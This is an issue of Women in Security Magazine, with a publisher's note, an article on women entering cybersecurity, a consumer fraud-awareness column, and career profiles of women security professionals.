Women in Security Magazine Issue23 by source2create

THE RISE OF WOMEN IN CYBERSECURITY: A RESURGENCE

POWERING CHANGE AND INNOVATION

THE PHOENIX EFFECT: WOMEN RESKILLING AND PIVOTING INTO CYBERSECURITY

FROM THE PUBLISHER

End-of-year publisher’s note

As 2024 draws to a close it’s the perfect time to reflect on an incredible year of growth, resilience and celebration within Women in Security. Throughout the past year we’ve tackled pressing questions, explored bold themes and highlighted the exceptional work being done by women across the cybersecurity landscape. This has been a year of navigating challenges and championing resilience, and I’m incredibly proud of what we’ve accomplished together as a community.

Our journey this year began with a look at Who Should Be in Security, a theme that invited discussions about the future of the industry’s workforce. We explored the importance of diversity, not just in gender but in background, experience and perspective, building a foundation of inclusivity that empowers everyone in the industry to contribute and thrive.

Next, we turned to The Future is Now, a theme focused on the cutting-edge advancements women are driving in technology and cybersecurity. With inspiring stories of leaders and innovators we highlighted how women are not only shaping the future but actively defining it in real-time. We dived into the transformative technologies being developed by women and examined how these advancements will set the course for the industry’s evolution in the coming decades.

In Guardians of Tomorrow we celebrated the powerful roles women play in safeguarding organisations, communities and critical infrastructure. This theme was a testament to the expertise and commitment women bring to cybersecurity. From protecting sensitive data to defending against cyber threats,

women across the globe are making significant contributions to security with a shared dedication to protecting the systems and people who depend on them.

Mid-year, we took on Rising Phoenix: A Tale of Resilience and Renewal, where we explored stories of triumph over adversity. This theme resonated deeply with our community, because it showcased women who have faced challenges head-on and emerged stronger. We featured leaders and change-makers who have shown us that resilience is more than just bouncing back; it’s rising above, transforming setbacks into stepping stones and inspiring others to do the same.

And, as we close out 2024, we’re concluding with Resurgence: Our Triumphant Ascent, celebrating the renewed strength and growth of women in security. This theme captures the spirit of a community that, despite the hurdles, continues to ascend with courage, determination and an unshakable commitment to progress. Resurgence honours the strides we’ve made together, showcasing the women who are leading the way in every corner of the cybersecurity industry.

I want to extend a heartfelt thankyou to everyone who made this year’s Australian Women in Security Awards an unforgettable success. To our judges, nominators, nominees, finalists and generous sponsors: your support and commitment are the pillars of these awards. Every nomination and recognition adds to the momentum we’re building toward a stronger, more inclusive industry. These awards aren’t just a celebration of individual achievements, they’re a testament to the incredible impact women have across the sector and to the positive change we can drive together.

Looking ahead to 2025, I am beyond excited to announce the return of the New Zealand Women in Security Awards, a chance to once again spotlight the talent and dedication of women in our sister country. We’re also expanding into new territories, with the first-ever Women in Security Awards launching in Tasmania and Hong Kong. This expansion reflects a vibrant, growing community that believes in the power of representation and recognition, and we’re honoured to support and celebrate even more women in these regions. So, stay tuned, there’s so much on the horizon!

Finally, thank you to all our readers, contributors and supporters. It’s your energy, dedication and enthusiasm that make Women in Security what it is. Your involvement, whether as a participant, advocate or ally, strengthens this community and drives us forward. It’s been a challenging year. I won’t lie. I have really struggled, but with each challenge we grow stronger and more united.

Here’s to a bright 2025, filled with new possibilities, expanded horizons and even greater achievements. Together, let’s continue to push boundaries, break barriers and build a security industry where everyone’s contributions are valued.

Thank you for being part of this journey, and here’s to coming back stronger than ever in the year ahead.

Swabey

Abigail Swabey PUBLISHER, and CEO of Source2Create

www.linkedin.com/in/abigail-swabey-95145312

aby@source2create.com.au

Abigail

ThankYou TO OUR SUPPORTING ASSOCIATIONS

THE RISE OF WOMEN IN CYBERSECURITY: A RESURGENCE POWERING CHANGE AND INNOVATION

by Abigail Swabey

For years, cybersecurity has faced a striking gender imbalance, with women historically making up only a small fraction of the workforce. However, recent years have seen an inspiring resurgence of women in cybersecurity—a shift that is reshaping the industry and bringing vital diversity to the fight against cyber threats.

BREAKING BARRIERS THROUGH EDUCATION AND MENTORSHIP

The increase in women entering cybersecurity has been driven by educational pathways, mentorship, and supportive organisations committed to advancing diversity. Programs like the New Zealand Network for Women in Security (NZNWS), WiCyS, WISECRA and the Australian Women in Security Network (AWSN) are helping women launch and grow their careers through mentorship, networking opportunities, and skills development. AWSN, for instance, has facilitated training and workshops, providing women with handson experience to succeed in technical and leadership roles. Similarly, Girls Who Code and CyberFirst are initiatives that introduce young women to tech and cybersecurity early, addressing the gender gap at its roots.

Universities and certification programs are also fostering inclusivity by offering tailored scholarships and learning paths. For example, The SANS Institute, one of the top cybersecurity training organisations, has collaborated with Women’s Society of Cyberjutsu to offer scholarships and specialised courses for women in cybersecurity. Their partnership provides a structured pathway into the industry, making it easier for women to acquire critical technical skills and confidence needed to excel.

WOMEN LEADING CHANGE ACROSS CYBERSECURITY

The effects of this resurgence are evident in both public and private sectors, where women are taking on increasingly influential roles. Take Shamane Tan, Chief Growth Officer at Sekuro, for instance. Shamane has not only achieved a leadership position in cybersecurity but has also become a vocal advocate for diversity and inclusion in the industry. Her role involves developing strategic cybersecurity solutions while fostering a culture that encourages gender diversity. This has not only advanced her organisation but has also positioned her as a role model for women in the sector.

In government roles, the U.S. Department of Homeland Security (DHS) has made notable strides, appointing Jen Easterly as the Director of the Cybersecurity and Infrastructure Security Agency (CISA). Her leadership has brought a fresh perspective to national cybersecurity, underscoring the importance of inclusivity, resilience, and proactive defence strategies. Easterly’s focus on collaboration and community-building within CISA has inspired young women to envision careers in cybersecurity and to see themselves as future leaders.

A MEASURABLE IMPACT ON THE INDUSTRY’S FUTURE

As more women enter cybersecurity, their impact is being felt across the industry. A report by (ISC)², an international cybersecurity certification organisation, showed that while women still represent only 24% of the cybersecurity workforce globally, their influence is growing, particularly in roles that emphasise governance, risk management, and education. For instance, Paula Januszkiewicz, CEO of CQURE and a well-known cybersecurity expert, has been instrumental in delivering cybersecurity training around the world. Through her work, she demonstrates how women’s expertise in cyber is changing the industry and raising the bar on cybersecurity practices.

Women in cybersecurity are often driven by a collaborative approach that leads to innovative solutions. They have been key to enhancing threat detection and response protocols by fostering teamwork, empathy, and fresh thinking. Organisations that prioritise gender diversity in security teams often report higher performance, reduced risk, and enhanced creative problem-solving abilities. Research has shown that diverse teams can identify security vulnerabilities more effectively because they approach problems from various perspectives.

ENCOURAGING THE NEXT GENERATION

This initiative, focused on helping underrepresented communities, is making an impact on the global cybersecurity landscape. Likewise, Australia’s SheLeadsTech program, under the ISACA Melbourne Chapter, provides young women with networking, mentorship, and leadership opportunities, ensuring they have a clear path to a career in cyber.

The surge in women entering cybersecurity is also helping inspire the next generation. Programs like CyberGirls in Nigeria offer training and mentorship

As women continue to break new ground, they’re creating a cybersecurity industry that’s more resilient, adaptable, and ready for the challenges of a digital future. The resurgence of women in cybersecurity is not only correcting historical imbalances but also laying the groundwork for a more diverse and effective cybersecurity workforce, capable of defending against the complex cyber threats of today and tomorrow.

Organisations that prioritise gender diversity in security teams often report higher performance, reduced risk, and enhanced creative problem-solving abilities.

A NEW ERA IN CYBERSECURITY

This resurgence marks a pivotal cultural shift, where diversity and inclusion are increasingly seen as essential strengths in combating cyber threats. As more women enter and thrive in cybersecurity, their collective contributions are shaping a new era of enhanced security through a blend of talent, innovation, and teamwork. The growing presence of women in cybersecurity isn’t just a welcome change— it’s a transformative force, with countless examples demonstrating that diversity is not merely an asset but a critical necessity. According to Cybersecurity Ventures, women are expected to hold 30 percent of cybersecurity jobs globally by 2025, with projections reaching 35 percent by 2031, underscoring the industry’s commitment to a more inclusive future.

If you're part of an organisation dedicated to promoting diversity and inclusion, we'd love to discuss our 2025 Awards packages with you.

These packages are designed to further our shared mission of recruiting, retaining, and advancing women in the cybersecurity workforce.

By becoming a sponsor and supporting our event, you'll visibly demonstrate your commitment to celebrating diversity and recognising accomplishments within the security industry.

AMANDA-JANE TURNER

Cybercrime is big business, thanks to technical advancement and interconnectivity creating more opportunities. This regular column will explore various aspects of cybercrime in an easy-to-understand manner to help everyone become more cyber safe.

COLUMN

Renew your vigilance against cyber enabled fraud

As the year ends and people settle in for holidays and parties, make gift purchases, book holidays, give to charitable holiday appeals and start to wind down, criminals are ready to pounce.

Criminals are known to exploit events, major holidays, charitable causes and brand names as bait in fraud attempts. These scams may be cyber-enabled or in person, but either way they are exploiting generosity, holiday times and emotive themes to trick people into gifting or paying money for a cause, paying for items that don’t exist, downloading malware from links in spoofed brand name emails, or providing personal identifying information that could be used for identity theft.

The availability, affordability and advances in online technology make it easier for criminals to create lookalike web domains, believable social media pages and posts, emails and texts, or faked charity ID cards. It can be increasingly challenging to determine if requests for donations, shopping discounts or cheap holiday destination tickets or events are genuine.

Criminals exploit year end, when people may be expecting to receive items as a result of their online holiday shopping, or are sending or receiving gifts via the mail. These fraudsters send text messages and emails, or phone people, pretending they are from a postal service or a country’s customs agency to give their claims believability. They may say a parcel has been delayed due to insufficient postage so the receiver needs to make a payment, or that the parcel has been held up at Customs, so they require more information from the addressee (bank details, name, address, date of birth, driver’s license details, or other government identifiers).

If in doubt about a message, independently locate the contact details for the postal, shipping, shop or customs service yourself and contact them directly to ask if the message came from them.

Be vigilant with emails or texts asking you to verify your PayID, PayPal or credit card details, and take care if a seller requests additional funds or an additional fee above the selling and posting costs for the ‘transaction’. Remember that criminals can make the caller ID appear to be from a known brand, and that, thanks to advances in AI, can use deep fakes to appear as someone else, or structure their message content to be more believable.

If you are asked to donate to or buy merchandise from a charity organisation, verify its legitimacy first. You can do this by checking the charity in online government charity registers, and then send your donation or buy your merchandise from their verified online or physical shop fronts, or where you can view and verify the legitimacy of a charity collector’s ID.

If you, or someone you know, is ever tricked by criminals, remember there is no shame in that; anyone can be a victim of crime. The only ones who should bear the shame are the criminals.

Resolve to renew your vigilance against fraud whether in person or online. Stay safe everyone.

www.linkedin.com/in/amandajane1

www.empressbat.com

WHAT’S HER JOURNEY?

Jahnavi Gurrappadia

Cyber Security Test Analyst at Insurance Australia Group (IAG)

Ididn’t have a fully defined vision of the roles I aspired to when I started,” Jahnavi Gurrappadia reflects on her beginnings in cybersecurity.

“My path unfolded organically, shaped by the experiences and opportunities that came my way.” Today, Jahnavi is a dedicated cybersecurity analyst, a role that represents not just a profession but a passion that has evolved through curiosity, resilience, and relentless learning.

Her journey into the field began with a simple curiosity about protecting information and the dangers of cyberattacks. “I had little to no knowledge about cybersecurity when I started,” she admits. “I knew I wanted to pursue it as a career, but I didn’t know where to begin.” With determination, she immersed herself in the basics, gradually building a solid technical foundation through certifications like the Google Cybersecurity Professional Certificate, the EC-Council’s SOC Analyst Certification, and OKTA Certified Professional.

For Jahnavi, hands-on learning has been pivotal. During her SOC Analyst certification course, she delved into tools like Splunk for Security Information

and Event Management (SIEM), which enabled her to understand logs and promptly analyse attacks. “Practice became a daily routine for me,” she says. This approach not only helped her overcome the steep learning curve but also ignited a deeper interest in understanding and addressing cyber threats.

Navigating her early career wasn’t without challenges. “Staying ahead of the ever-evolving threat landscape is one of the most complex aspects of this field,” she explains. Yet, she’s found ways to thrive amidst the dynamic demands. Attending industry conferences, collaborating within the cybersecurity community, and leveraging advanced tools like AI and machine learning have all played a role in her ability to stay adaptable. “Engaging with peers and experts gives me diverse perspectives and invaluable insights,” she shares.

Her journey hasn’t been devoid of doubts. “There were moments when the complexity of the field felt overwhelming,” she acknowledges. During one particularly trying time, Jahnavi sought guidance from mentors in the cybersecurity community. Their encouragement reminded her to view obstacles as opportunities for growth. “Each challenge has ultimately strengthened my resolve,” she adds, a testament to her resilience and growth mindset.

Jahnavi’s passion for cybersecurity extends beyond technical skills; she places great value on interpersonal communication. “We have to make people with little to no cybersecurity background—like CEOs or managers—understand why it’s essential to invest in security measures,” she explains.

This ability to bridge technical knowledge and layman’s understanding is a cornerstone of her approach, and one she believes is crucial for any cybersecurity professional.

Reflecting on her early decisions, Jahnavi advises her younger self—and those considering a similar path— to embrace lifelong learning, build a strong technical foundation, and engage with the cybersecurity community. “Above all, cultivate a genuine passion for security,” she emphasises. “This field requires dedication and a relentless pursuit of knowledge. Your passion will drive you to overcome challenges and continuously strive for excellence.”

From her first tentative steps into the unknown to becoming a cybersecurity professional with clear goals and a proactive approach, Jahnavi’s journey is a story of perseverance and discovery. “If you love what you do, the learning never stops,” she says with a smile. And for Jahnavi, the journey is just beginning.

Jahnavi Gurrappadia admits about her entry into the cybersecurity world. “My path has unfolded organically, guided by curiosity and opportunities.” From those initial uncertain steps to a burgeoning career in cybersecurity, Jahnavi’s journey is one of tenacity, growth, and continuous learning.

She believes the foundation for aspiring professionals lies in understanding the fundamentals: “Network security, secure coding practices, and the ethics of cybersecurity are non-negotiable,” she says. Staying ahead in a fast-evolving field has meant embracing the opportunities presented by certifications, workshops, and emerging technologies. “The Certified Threat Intelligence Analyst (CTIA) and Certified Ethical Hacker (CEH) are next on my list,” she shares, underscoring her commitment to lifelong learning.

For Jahnavi, staying current is both a necessity and a passion. She views advancements in artificial intelligence, machine learning, and cloud security as pivotal to the future. “AI and ML are transforming the way we detect and respond to threats,” she notes, emphasising the dual role these technologies play in both defending against and enabling attacks.

“Above all, cultivate a genuine passion for security. This field requires dedication and a relentless pursuit of knowledge. Your passion will drive you to overcome challenges and continuously strive for excellence.”

Navigating her career hasn’t been without its challenges. From addressing the vulnerabilities of IoT devices to managing the growing complexities of cloud infrastructure, each hurdle has reinforced her resolve. “The human element is always a critical factor,” she observes, noting the importance of fostering a security-conscious culture to counter threats like phishing and social engineering.

Mentorship has played a crucial role in her journey. “Having a mentor Mark (Mitch) Stephenson who emphasised ethics and integrity shaped my approach to cybersecurity,” she reflects. These values, coupled with her technical expertise, guide her as she tackles complex security challenges and explores career advancements. Beyond salary, Jahnavi evaluates the culture, professional development opportunities, and work-life balance offered by potential roles. “Burnout is a real concern in our field,” she says, stressing the importance of finding an organisation that aligns with her values and goals.

Looking to the future, Jahnavi remains optimistic about the ever-changing cybersecurity landscape. She views each development—be it 5G networks or enhanced data privacy regulations—as an opportunity to adapt and innovate. “This is a field where you never stop learning,” she says, “and that’s what makes it so exciting.”

Jahnavi’s story is a testament to the power of perseverance and adaptability. With a strong foundation, a clear sense of purpose, and an

unrelenting passion for cybersecurity, she is carving out her place in a dynamic and vital industry. “At the heart of it all,” she concludes, “is a commitment to protect and secure the digital world we all rely on.

For Jahnavi Gurrappadia, cybersecurity is more than a profession—it’s a passion driven by purpose. As she reflects on her role, it’s clear that her commitment to the field extends beyond technical expertise to fostering community and collaboration. “Mentoring aspiring professionals brings me immense fulfilment,” she shares. “Watching my mentees overcome challenges and grow into their potential is one of the most rewarding aspects of my work.”

Jahnavi’s days are filled with diverse responsibilities, from analysing system logs and implementing security patches to participating in strategy meetings with senior management. Each task is approached with precision, a testament to her dedication to safeguarding information systems. “The integration of security into every workflow is essential,” she says. “Collaboration across departments ensures that risks are mitigated at every level.”

To stay ahead in a field defined by rapid technological evolution, Jahnavi employs a proactive approach to learning. Whether diving into industry webinars or leveraging tools like SIEM systems, she continuously hones her skills. “The real-time insights these tools provide are invaluable,” she notes, emphasising their role in swift threat detection and mitigation.

Balancing a demanding career with personal wellbeing is no small feat, yet Jahnavi has mastered the art of equilibrium. “Time management, mindfulness practices, and creative pursuits like singing keep me grounded,” she says. “Connecting with loved ones and allowing myself the space to rest are just as important as meeting professional deadlines.”

Beyond the technicalities, Jahnavi finds inspiration in her professional affiliations with organisations like ISC² and the Cyber Threat Alliance. These memberships offer a platform to exchange ideas and stay attuned to global trends, enhancing both her expertise and her network. “Belonging to

these organisations keeps me at the forefront of industry developments while fostering meaningful connections,” she explains.

Looking ahead, Jahnavi envisions a cybersecurity landscape shaped by artificial intelligence, cloud migration, and evolving regulations. She is eager to tackle the challenges posed by these advancements, all while championing ethical practices and mentorship. “At the heart of cybersecurity lies a responsibility to protect,” she reflects. “For me, that’s not just about securing systems but also about empowering people.”

Jahnavi’s journey is a story of resilience, growth, and a relentless pursuit of excellence. With a focus on community, innovation, and balance, she continues to leave an indelible mark on the field of cybersecurity.

The cybersecurity skills gap is a challenge felt deeply by organisations worldwide, and Jahnavi’s team is no exception. The ever-evolving nature of cyber threats, coupled with the growing complexity of digital infrastructures, has amplified the need for skilled professionals. “The shortage of talent has created a fiercely competitive market,” she observes. “Recruiting and retaining top cybersecurity talent often requires innovative approaches.”

Some roles have proven particularly elusive to fill. “Security Operations Center (SOC) analysts, Threat intelligence analysts and Identity Access

"Your existing skills can be a tremendous asset. Whether it’s analytical thinking, problemsolving, or expertise in related domains, these strengths can serve as a foundation for success in cybersecurity.”

management (IDAM) analysts are among the most challenging to recruit,” Jahnavi notes. These roles demand not only technical expertise but also advanced analytical skills and a deep understanding of threat landscapes. “It’s not just about finding someone with the right skills—it’s about finding someone with the resilience and agility to adapt to a fast-paced, high-stakes environment.”

Despite these hurdles, Jahnavi’s organisation has adopted a proactive strategy. “We focus on creating an environment that fosters continuous learning, professional growth, and balance,” she explains. By investing in training programs and nurturing new talent, they’ve cultivated a sustainable pipeline of skilled professionals while retaining their existing workforce.

Jahnavi also offers thoughtful advice for those looking to transition into cybersecurity from other fields. “Your existing skills can be a tremendous asset,” she emphasises. “Whether it’s analytical

thinking, problem-solving, or expertise in related domains, these strengths can serve as a foundation for success in cybersecurity.”

She highlights the importance of practical experience, encouraging newcomers to engage in projects, simulations, and certifications to build confidence and competence. “Continuous learning is non-negotiable,” she adds. “Staying updated on trends and immersing yourself in the community are key to thriving in this field.”

Jahnavi’s insights underscore her commitment to not only advancing her own career but also shaping the future of the cybersecurity profession. Her ability to navigate challenges, mentor others, and adapt to change exemplifies the resilience and ingenuity required to thrive in a critical and dynamic industry.

www.linkedin.com/in/jahnavi-gurrappadia-834873152

Favour Ugwoke

SOC Analyst at SHELT Global Ltd

For Favour Ugwoke, cybersecurity is more than a career—it’s a deeply personal mission. Her journey began with a painful incident when her mother fell victim to a social engineering and phishing scam, losing her life savings. “I saw the pain it caused her,” Favour reflects. “I told myself, ‘No one should have to go through this.’ I wanted to protect people from such experiences.” when the opportunity to learn about cybersecurity came along, she embraced it wholeheartedly”.

Starting out, Favour didn’t have a clear path in mind. “I knew I wanted to protect people, but I didn’t understand the roles or where I fit in,” she admits. Coming from a non-technical background, she felt lost at first. That changed when she joined the CyberSafe Foundation’s CyberGirls program, an initiative aimed at training African women in cybersecurity. “The program introduced me to so many professionals who shared their career paths. That insight helped me figure out what I wanted to do. I began with penetration testing and eventually transitioned into working in a Security Operations Center (SOC).”

Today, as a SOC Analyst with skills in both offensive and defensive security, Favour finds fulfillment in her

work. “Protecting organizations from cybercriminals is exactly what I’ve always wanted to do. Knowing I’m making a tangible impact in the industry is incredibly rewarding.”

In an industry that evolves constantly, staying current is a challenge Favour meets head-on. She keeps up with developments through cybersecurity blogs, forums, and online courses. Platforms like TryHackMe and Let’s Defend have been instrumental in sharpening her technical skills. She’s also an active participant in online communities, using spaces like LinkedIn and Discord to connect with peers, exchange ideas, and stay informed.

Looking back, Favour has advice for her younger self: “Start earlier. Cybersecurity isn’t easy, but it’s worth it. Learn the basics, play with tools like Linux and Python, and be curious about how systems work. It might seem overwhelming at first, but every little step adds up.”

When she looks to the future, Favour sees significant challenges on the horizon. “AI-powered attacks are going to be a major problem,” she notes, pointing to sophisticated phishing, deepfakes, and adaptive malware. She’s also concerned about ransomware’s growing complexity, particularly double and triple extortion tactics. “Organizations need to adopt zerotrust security models, invest in AI defenses, and build a strong culture of cybersecurity awareness. The threats are real, but with the right strategies, we can stay ahead.”

Balancing the demands of cybersecurity with her personal life is important to Favour. “Workdays are for work. I stay focused and avoid distractions. When I’m off, I make time for other interests like modeling or simply relaxing with a movie. It’s all about finding balance and knowing when to take a step back.”

"Start earlier. Cybersecurity isn’t easy, but it’s worth it. Learn the basics, play with tools like Linux and Python, and be curious about how systems work. It might seem overwhelming at first, but every little step adds up.”

to a mindset of continuous learning, a principle she considers non-negotiable in the cybersecurity field.

For those considering a transition into cybersecurity, Favour offers a clear message: “Be curious, stay determined, and don’t be afraid to start from scratch. With focus and persistence, you can make a difference. The world needs more people committed to keeping our digital spaces safe.”

Throughout her journey, mentorship and representation have played a crucial role. “Women like Confidence Staveley have been a huge inspiration to me. Seeing her break stereotypes taught me that my dreams are valid. Her example motivates me to keep pushing forward.” Favour credits her growth

Favour’s journey, shaped by personal loss and a relentless drive to protect others, is a powerful reminder of what can be achieved with purpose and determination. Her story continues to inspire, not just as a cybersecurity professional, but as a defender of the digital world.

www.linkedin.com/in/favour-ugwoke/

Nikki Robinson

STSM and Senior Manager, IBM / Adjunct Faculty, UMGC at Maryland

Nikki Robinson’s career in cybersecurity began with a spark that ignited during her time in IT forensics. The investigative nature of the work, paired with the deep technical understanding it required, drew her in immediately. “Being part of an investigation was fascinating,” she shares. “But when I discovered vulnerability chaining, I knew cybersecurity was where I belonged.” This realization didn’t just guide her career—it inspired her to pursue advanced degrees, including a Doctorate of Science in Cybersecurity and a PhD in Human Factors, merging the technical and human aspects of the field.

Her journey has been defined by a blend of curiosity, determination, and an unwavering commitment to growth. Early in her career, Nikki credits her time on the Helpdesk for laying the groundwork. “It was there that I developed my love of troubleshooting and problem-solving,” she explains. “That curiosity, paired with my passion for research, has been a driving force throughout my career.”

The ever-evolving nature of cybersecurity presents constant challenges, but for Nikki, that’s part of the appeal. “The scope of what I need to understand—

from infrastructure to cloud and AI—is massive, and technology is always changing,” she says. “But that’s what I love most. It keeps me learning and ensures my work is never repetitive.”

However, her path hasn’t been without its hurdles. Like many in the industry, Nikki has faced moments of self-doubt. “Imposter syndrome is something I still deal with,” she admits. “When I published my first book, I questioned whether I was the right person to do it. But I’ve learned that pushing through those doubts leads to the greatest growth.”

In the early days of her career, Nikki had a clear vision of where she wanted to go. “I started in IT operations with the goal of becoming a security engineer,” she says. That focus guided her to a security engineering role and later to a position at IBM, where she transitioned into security architecture. Over time, her perspective shifted. “Now, I worry less about the title and more about the mission behind the role. It’s about finding work that’s meaningful and impactful.”

Reflecting on her journey, Nikki often thinks about the advice she’d give her younger self. “Trust your instincts,” she says. “When I decided to pursue an

online degree instead of staying at a traditional university, I faced so much criticism. But I knew it was the right path for me, and it’s what set me up for the success I have today. Stick to your decisions, work hard, and don’t let anyone tell you what you can’t do.”

Nikki also encourages aspiring cybersecurity professionals to consider the value of technical experience. “A strong technical foundation can be incredibly helpful,” she says. “If you’re struggling to land a cybersecurity role right away, look into systems engineering, development, or cloud roles. They’ll give you valuable skills and perspectives that you can carry into a cybersecurity career.”

Looking to the future, Nikki sees significant challenges ahead for the field, particularly with the rise of AI-driven threats and the increasing sophistication of attack methods. Her passion for vulnerability chaining has shaped her ability to tackle

these challenges, informing her research, writing, and problem-solving approaches.

Maintaining balance in such a demanding field can be difficult, but Nikki has found a system that works for her. “Each year, I set a personal goal outside of work— something physical and outdoors, like triathlons or horseback riding,” she says. “It helps me reset mentally and physically, keeping me grounded and ready to take on the demands of my career.”

Nikki Robinson’s story is one of curiosity, perseverance, and purpose. From her early days on the Helpdesk to her role as a leader in cybersecurity, she has shown that success in the field is built on continuous learning, trusting your instincts, and staying focused on what truly matters.

www.linkedin.com/in/dr-nikki-robinson

Dorota Kozlowska

Penetration Testing and Social Engineering Specialist | Security Analyst at Black Hills Information Security

Dorota Kozlowska’s pathway in cyber security began with a spark of curiosity inspired by pop culture and her fascination with the digital world. As a natural problem-solver, she found herself drawn to the thrill of outsmarting complex systems, a passion she first encountered in her government role. Over time, this curiosity evolved into a commitment to protecting against real-world threats and led her to carve out a path in offensive security. “I’ve always been captivated by the idea of unravelling mysteries,” she says. “That passion became the foundation of my career in cybersecurity.”

Taking the leap from a secure government role to the challenging world of penetration testing wasn’t easy, but it was pivotal. Dorota began attending cybersecurity meetups, building her network, and immersing herself in the field. She invested in certifications, extensive training, and countless hours practising penetration testing techniques. “It was a calculated risk, but it was necessary,” she recalls. “The commitment to constant growth and taking those leaps of faith shaped my professional path.”

For Dorota, staying ahead in the ever-changing cybersecurity landscape is both the most exciting and challenging aspect of her role. She keeps herself sharp through advanced training, hands-on projects, and active engagement with the cybersecurity community. Her philosophy is simple: “You have to embrace being a lifelong learner,” she explains. Every day is an opportunity to grow, a sentiment she captures in her favourite hashtags: #NeverGiveUp and #LearningEveryDay.

Resilience has been a recurring theme in Dorota’s life, extending far beyond her career. Surviving cancer not only transformed her perspective but also reinforced her determination. “It taught me to stop procrastinating and live fully in the moment,” she says. “There’s no challenge I’m afraid of anymore. I’ve realised I am the architect of my own life, and I want to create something beautiful.”

Although her initial foray into cybersecurity was organic, she eventually found her calling in offensive security. “Once I discovered the impact of this work, I set my sights on becoming a Penetration

"There’s no challenge I’m afraid of anymore. I’ve realised I am the architect of my own life, and I want to create something beautiful.”

Tester,” she shares. “Since then, my focus has been mastering my craft and growing into a seasoned Red Teaming Specialist.”

Her advice to aspiring cybersecurity professionals is grounded in her own experiences. “Believe in yourself, embrace curiosity, and don’t settle for less than what you deserve,” she emphasises. “It’s okay to change paths if something doesn’t feel right—life is too short to stay in the wrong place.” For those starting out, she highlights the importance of foundational knowledge in computer science, networking, and programming, alongside practical experience through internships, labs, or competitions.

Looking ahead, Dorota sees AI-driven security tools and zero-trust architectures reshaping cybersecurity. However, she also warns of the growing sophistication of threats, including ransomware-asa-service and AI-enhanced cyberattacks. “We need to stay vigilant and anticipate these evolving tactics,” she says.

Dorota finds deep satisfaction in uncovering vulnerabilities and knowing her work makes systems safer. “It’s incredibly rewarding to know that what I do helps protect others from potential harm,” she reflects. She balances the demands of her role by dedicating time to her passions, including cycling, playing the electric guitar, and practising Kyudo, the Japanese art of archery. “Kyudo helps me find my centre and teaches patience,” she says, adding with a smile that she’s also recently taken up snowboarding and hockey-style ice skating. “You’re never too old to try something new.”

In her daily work, Dorota relies on tools like Kali Linux, Burp Suite, and Metasploit to identify vulnerabilities and prioritise risks. Beyond her technical expertise, she values the community aspect of cybersecurity. As a member of CEFCYS and other professional forums, she benefits from mentorship, networking, and the exchange of ideas.

Her story is a testament to the power of perseverance and adaptability. For those transitioning into cybersecurity, she offers a reminder: “Embrace the learning curve and stay curious. Start small and seek out opportunities to practise. Cybersecurity rewards those who push through challenges and think critically.”

Through her resilience, dedication, and passion for innovation, Dorota Kozlowska has not only built an inspiring career but also created a legacy of breaking barriers in cybersecurity. Her journey is a powerful reminder that with courage and curiosity, the possibilities are endless.

www.linkedin.com/in/dorota-kozlowska

twitch.tv/wwdhacks

x.com/WWD_Hacks

youtube.com/@wwdhacks

Ramona Ratiu

MS, CISM, CISA, GCCC, GSTRTCyber Security | Adjunct Professor | Board Strategic Advisor | Mentor | SheLeadsTech Ambassador

For Ramona Ratiu, Head of Cyber Resilience Testing Program at Zurich Insurance, cybersecurity wasn’t a predetermined path, but rather one that gradually emerged as she navigated her academic and professional journey. “Cybersecurity wasn’t a path I planned, but one that found me as I navigated the rapidly evolving digital landscape,” she shares. Her academic beginnings were rooted in a Bachelor’s degree in Finance from Babes Bolyai University in Romania, where she developed strong analytical skills. However, it was during her Master’s in Information Systems at DePaul University in Chicago that the spark for cybersecurity was ignited. Initially focused on Business Intelligence and Analytics Systems, it wasn’t until a professor discussed the intersections of technology, risk, and compliance that Ramona’s curiosity deepened.

“It was my first glimpse into the broader implications of cybersecurity—not just as a technical challenge but as a critical enabler of trust in a digital world,” Ramona reflects. She began to see cybersecurity not merely as a reactive measure, but as a proactive force that could anticipate threats, foster resilience, and support innovation.

Her early career in Security Governance, Risk, and Compliance revealed the nuances of the cybersecurity field, where she discovered how crucial the synergy of people, processes, and technology is to defending against threats. “Cybersecurity is less about barriers and more about bridges—bridging knowledge gaps, uniting teams, and connecting resilience to business objectives,” she explains. This realization fueled her passion to delve deeper into the strategies of attackers and understand how to empower organizations to become more proactive in their defense mechanisms. Her work in creating cyber attack simulations became a defining aspect of her approach—thinking like an adversary while helping organizations build agility and resilience.

Despite the challenges of a rapidly changing landscape, Ramona’s journey has been one of continual evolution and excitement. “Cybersecurity isn’t just a career; it’s a mission,” she says. “The relentless pace of change fuels my drive to stay ahead, find creative solutions, and ensure that businesses and individuals alike can thrive securely in an increasingly digital world.”

When reflecting on the early stages of her career, Ramona notes that she didn’t have a clear roadmap for her journey. “My path unfolded organically, shaped by curiosity, opportunities, and an eagerness to explore the unknown,” she shares. This flexibility allowed her to remain adaptable, open to emerging trends, and ready to seize opportunities as they arose.

"Cybersecurity isn’t just about technology; it’s about understanding the impact of your decisions in a world where a single digital mistake—a post, a comment, an image—can last forever.”

“Not having a rigid roadmap allowed me to explore, grow, and discover paths I hadn’t even imagined,” she says, acknowledging that curiosity and creativity guided her toward cybersecurity.

As for advice to her high school self, Ramona advocates for a focus on curiosity and ethics in the digital world. “Cybersecurity isn’t just about technology; it’s about understanding the impact of your decisions in a world where a single digital mistake—a post, a comment, an image—can last forever,” she emphasizes. Critical thinking, she believes, is the greatest ally for aspiring cybersecurity professionals. She advises young students to embrace the unknown, develop analytical skills, and stay adaptable to changing opportunities, as it was these traits that ultimately shaped her career.

Looking ahead, Ramona predicts that technology will continue to shape the future of cybersecurity. “The integration of artificial intelligence and emerging technologies like quantum computing will revolutionize cybersecurity, enabling predictive threat detection and advanced defenses,” she notes. However, she also cautions that these developments must be approached responsibly to prevent misuse and bias. Beyond technology, she emphasizes the need for a human-centered approach, focusing on empowering individuals through education and digital literacy.

Collaboration will also play a key role in the evolution of cybersecurity, especially in light of increasingly sophisticated cyber threats. “Addressing the complexity of these threats will require unprecedented collaboration among governments, industries, and international organizations,” she explains. Ramona envisions a future where cybersecurity isn’t just about defense, but about fostering trust, innovation, and inclusivity in the digital world. “By embedding ethics, equity, and humanity into our cybersecurity strategies, we can create a digital world that’s not only safer but also fairer and more inclusive for all.”

As someone who’s actively contributed to the cybersecurity community, Ramona’s involvement in

organizations such as ISACA has been invaluable. Her role in the ISACA Chicago Chapter and her leadership of the SheLeadsTech with Expertise program underscore her commitment to elevating women in technology. “ISACA’s global network has provided me with invaluable opportunities to connect with like-minded professionals and leaders, exchange knowledge, and stay at the forefront of emerging trends,” she reflects. She takes pride in her role as a mentor and advocate, and in 2023, was honored with the ISACA Inspirational Leadership Award for her dedication to education, mentorship, and advancing women in tech.

